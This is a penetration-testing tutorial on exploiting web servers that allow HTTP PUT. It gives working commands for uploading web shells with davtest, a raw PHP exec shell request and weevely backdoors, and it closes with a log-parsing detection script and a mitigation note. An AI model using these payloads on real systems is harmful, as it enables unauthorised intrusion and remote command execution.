Abusing HTTP PUT

Detection of vulnerability

Run Nikto:

nikto --host <target ip>:<target port>

If it returns

+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

You are potentially in business.

Some options for exploitation:

Try to get a backdoor with davtest

davtest -url http://<target ip>:<target port> -sendbd auto -cleanup

This will test every payload davtest has, send backdoors, and clean up after itself.

Try a basic PHP backdoor with Burp

Capture a request and send it to Repeater. Change the method to PUT and add some PHP code to the bottom of the request. It should look roughly like this:

PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

echo exec($_GET[cmd]);

Once this is up, navigate to the page and try to run commands like so:

http://<target ip>:<target port>/test.php?cmd=whoami

Create a backdoor with weevely and upload it with poster

Start by downloading the Poster add-on for Firefox.

Next, spawn a backdoor with weevely:

weevely generate evil /root/back.php

This will output back.php with the password evil.

Go ahead and upload this shell using the PUT method with Poster by setting the following fields:

URL: http://<target ip>:<target port>/back.php
File: <location of back.php>

and then clicking the PUT button.

Now access the backdoor like so:

weevely http://<target ip>:<target port>/back.php evil


Once you're done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button). Alternatively, since you'll probably have gotten a shell to the system at this point, you can rm it as well.
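
Seen from the web server's access log, the sequence on this page (a successful PUT of a script file, requests to that file, then a DELETE) is easy to flag. The following is an added example, not part of the original page; the log lines are constructed samples in combined log format, and the extension list and the function name find_put_uploads are assumptions.

```python
import re

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2017:22:30:01 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Nikto"
203.0.113.7 - - [17/Feb/2017:22:31:10 +0000] "PUT /test.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Feb/2017:22:31:40 +0000] "GET /test.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Feb/2017:22:32:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Feb/2017:22:40:00 +0000] "PUT /notes.txt HTTP/1.1" 403 0 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Feb/2017:22:45:00 +0000] "DELETE /test.php HTTP/1.1" 204 0 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: extensions this server would pass to an interpreter; adjust per site.
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl")


def find_put_uploads(log_text):
    """Flag successful PUT writes and any later activity on uploaded scripts."""
    uploaded = {}   # path -> client that created it via PUT
    findings = []   # (kind, client, timestamp, request target)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, when, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        ok = status.startswith("2")  # only 2xx means the server acted on it
        if method == "PUT" and ok:
            if path.lower().endswith(SCRIPT_EXT):
                uploaded[path] = client
                findings.append(("script-upload", client, when, target))
            else:
                findings.append(("put-write", client, when, target))
        elif path in uploaded and ok:
            if method == "DELETE":
                findings.append(("cleanup", client, when, target))
                del uploaded[path]
            else:
                findings.append(("uploaded-script-run", client, when, target))
    return findings


if __name__ == "__main__":
    for kind, client, when, target in find_put_uploads(SAMPLE_LOG):
        print(f"{kind:20} {client:15} {when}  {target}")
```

Any script-upload finding means the server accepts PUT for that path, so the mitigation is to disable the PUT and DELETE methods or require authentication for them.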